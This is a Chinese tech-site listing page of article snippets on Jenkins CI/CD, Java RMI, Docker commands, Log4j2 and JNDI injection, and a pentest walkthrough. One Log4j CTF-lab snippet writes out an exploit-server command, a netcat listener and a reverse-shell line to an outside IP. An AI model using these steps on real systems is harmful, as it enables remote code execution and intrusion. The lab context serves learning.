ICode9

精准搜索请尝试: 精确搜索
  • .NET 微服务——CI/CD(4):避坑和一点经验2022-01-07 16:35:04

    如果你看过之前几篇文章,应该已经Jenkins成功搭建了CICD环境,但是进入正式环境会有一些坑,不注意中招的话很难受,这里总结一下,避免重复消耗精力。 后门漏洞 Jenkins有后门,这是个老问题了。虽然早在18年就有人发现,而且当时Jenkins团队也快速打了补丁(2.137以后),但你下载的某些插件如果有

  • 从代码层面看RMI规范的实现与攻击原理(二)2022-01-05 23:05:49

    从代码层面看RMI规范的实现与攻击原理(二) 现在的工作真的是太鸡儿无聊了,不出活也没有进步,拉胯。 上一篇文章我们看了RMI客户端侧代码获取一个注册中兴的操作,这一次我们来看看lookup函数是怎么工作的,有不对的地方大佬轻点喷。 在上一篇中我们知道最终获取到的Registry对象

  • docker的tag的注意2022-01-05 17:38:32

    一: docker tag 如果心得镜像你不指定版本会是默认的latest 二: docker tag 官方解释是硬链接 往往会联想到文件系统的硬链接,也就是node和block的指定关系,按照文件系统的硬链接的特性是原链接删除后硬链接正常使用,但是实操发现,这在容器中是不一样的 比如有两个镜像,一个原镜像,一

  • Zookeeper(3)实战2022-01-01 19:02:01

    RMI RMI(Remote Method Invocation) 远程方法调用。 RMI 是从 JDK1.2 推出的功能,它可以实现在一个 Java 应用中可以像调用本地方法一样调用另一个服务器中 Java 应用(JVM)中的内容。 RMI 是 Java 语言的远程调用,无法实现跨语言。 执行流程 Registry(注册表)是放置所有服务器对

  • docker 常用命令2021-12-31 13:02:29

      删除所有镜像 docker rmi $(docker images -q) 清除坏的:镜像 docker rmi $(docker images -f "dangling=true" -q) 删除docker images中为none的镜像 docker ps -a | grep "Exited" | awk '{print $1 }'|xargs docker stop docker ps -a | grep "Exited

  • 一次完整的渗透测试&仅供学习研究2021-12-30 14:02:01

    声明:本文仅限学习研究讨论,切忌做非法乱纪之事 Web打点 渗透测试中,Web端最常见的问题大多出现在弱口令、文件上传、未授权、任意文件读取、反序列化、模版漏洞等方面。因此,我们着重围绕这些方面进行渗透。 1.弱口令 先介绍一些好用的字典: https://github.com/fuzz-security

  • Apache Log4j复现2021-12-30 13:35:54

    0x01:影响版本 Apache Log4j 2.x < 2.15.0-rc2 0x02:Bugku环境 地址:https://ctf.bugku.com/challenges/detail/id/340.html 在用户名处插入dnslog 反弹shell java -jar JNDIExploit-v1.11.jar -i 106.52.219.217 建立监听 nc -lvnp 12345 反弹shell的语句 nc 106.52.219.217 12

  • JNDI注入高版本绕过2021-12-22 23:33:50

    转载于JNDI注入高版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先

  • log4j2安全漏洞2021-12-22 22:06:42

    产生原理: log4j2版本安全漏洞。 rmi远程方法调用:jvm与jvm进程做远程交互的服务。 攻击方式: 黑客部署nginx服务器和rmi服务器,nginx中放入攻击脚本(是个class文件)。 服务器的rmi参数必须是true. 通过远程注入方式(rmi协议),让服务器通过log4j2发送rmi请求到rmi服务器,rmi服务器会到nginx

  • tomcat 启动时 出现 More than one fragment with the name [log4j] was found. This is not legal with relativ2021-12-21 10:03:46

      21-Dec-2021 08:42:28.419 严重 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.ContainerBase.addChildInternal ContainerBase.addChild: start: org.apache.catalina.LifecycleException: Failed to start component [StandardEngine[Catalina].Standa

  • 【紧急】Log4j又发新版2.17.0,只有彻底搞懂漏洞原因,才能以不变应万变,小白也能看懂2021-12-20 13:02:03

    1 事件背景 经过一周时间的Log4j2 RCE事件的发酵,事情也变也越来越复杂和有趣,就连 Log4j 官方紧急发布了 2.15.0 版本之后没有过多久,又发声明说 2.15.0 版本也没有完全解决问题,然后进而继续发布了 2.16.0 版本。大家都以为2.16.0是最终终结版本了,没想到才过多久又爆雷,Log4j 2.17.0

  • Log4j2史诗级漏洞导致JNDI注入问题探析2021-12-19 06:31:07

    背景 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,比如在用户登录的时候打印一些异常信息,如xxx密码输入错误超

  • 快速复现利用Log4j漏洞启动windows计算器2021-12-17 22:31:28

    了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u102,不能高于这个版本。 通过如下pom.xml建立一个maven项目 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/

  • docker012021-12-15 13:03:14

    假设你想用某个命令,但是又不知道该命令的一些参数怎么用,这时候上面的万能帮助命令就派上用场了。 更有甚者,你连命令也不记得了,那直接输入: docker --help   要是命令行看的太累,没关系,贴心的我给你们找好了官方参考: https://docs.docker.com/engine/reference/commandline/docker

  • log4j-rce复现2021-12-15 12:33:44

    声明:没研究过Java漏洞,有错误的地方一定要告诉我!!原理我也没有继续跟。 01 分析 师傅带着理了一遍,思路清晰了。 一句话总结就是:让引用了log4j的漏洞类,然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ,就会通过动态的远程加载我们精心构造的一个恶意类,恶意类编

  • JNDI注入demo使用rmi方式2021-12-12 17:58:22

    JNDI注入demo 大致说下原理,JNDI可以获取远程类并在当前环境里面执行。 如果我们知道的某个程序某一处执行了JNDI,那么我们编写一个恶意类让其访问获取,就可以做很多事情了。 当前demo使用的是rmi协议 一。准备工作 1.编写一个恶意类Muma. 里面调用了calc,这个相当于调用了一

  • Apache Log4j2远程代码执行漏洞复现2021-12-12 13:03:54

    TOApache Log4j2远程代码执行漏洞复现 漏洞原理 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本Log4j2.x<=2.14.1漏洞复现 漏洞原理的分析: 创建复现工程demo 引入log4j 的jar包 版本在log4j 2.0~2.14.1范围里,demo中引入的版本是2.13.3,如下: <depen

  • 复现 log4j2 CNVD-2021-95914 漏洞2021-12-11 20:02:41

    前景:昨天被一则新闻刷屏     当看到这个消息的时候,公司也启动紧急响应,要求来检查目前生产中使用的log4j版本是否有这个问题,根据火线官方说明,但凡是版本在 2.x <= 2.15.0-rc1,都会有这个漏洞,一看到这个,我就知道基本全覆盖了,果然一看服务器上的组件,hadoop全家桶、elasticsearch、

  • Log4j 漏洞复现2021-12-11 01:33:51

    pom.xml 中: <dependencies> <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>l

  • Java之RMI和JNDI2021-12-10 23:34:39

    目录1 RMI1.1 rmi概念1.2 RMI基础运用1.2.1 定义一个远程的接口1.2.2 编写一个远程接口的实现类1.2.3 创建服务器实例1.2.4 编写客户端并且调用远程对象1.3 RMI反序列化攻击1.3.1 定义远程接口1.3.2 远程接口实现1.3.3 服务器1.3.4 客户端2 JNDI2.1 概念2.2 JNDI结构2.2.1 Initial

  • Java之RMI和JNDI2021-12-10 23:30:41

    文章目录 1 RMI1.1 rmi概念1.2 RMI基础运用1.2.1 定义一个远程的接口1.2.2 编写一个远程接口的实现类1.2.3 创建服务器实例1.2.4 编写客户端并且调用远程对象 1.3 RMI反序列化攻击1.3.1 定义远程接口1.3.2 远程接口实现1.3.3 服务器1.3.4 客户端 2 JNDI2.1 概念2.2 JNDI结

  • Docker镜像操作命令2021-12-05 14:34:08

    查询本机的所有镜像信息 docker images #查询本机的镜像信息,只以镜像ID显示 docker images -qa 查询镜像 docker search XXX # 使用过滤条件,查询超过2000颗星的XX镜像 docker search xxx -f stars=2000 查看帮助信息 docker search --help 也可以在docker hub上进行

  • 20211109:docker批量处理指令2021-11-09 11:31:33

    ## **docker指令:** 杀死所有正在运行的容器 docker kill $(docker ps -a -q) 删除所有已经停止的容器 docker rm $(docker ps -a -q) 删除所有未打 dangling 标签的镜像 docker rmi $(docker images -q -f dangling=true) 删除所有镜像 docker rmi $(docker images -

  • 打开idea启动Tomcat时 错误: 代理抛出异常错误: java.rmi.server.ExportException: Port already in use: 1099;2021-11-06 10:32:30

    一、问题描述 今天在IntelliJ IDEA中启动Tomcat服务器时就出现了如下图所示的错误 错误:代理抛出异常错误: java.rmi.server.ExportException: Port already in use: 1099; nested exception is: java.net.BindException: Address already in use: JVM_Bind 这里的意思是:1099端口

  • rmi2021-11-04 17:33:02

    一、介绍 Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。 RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有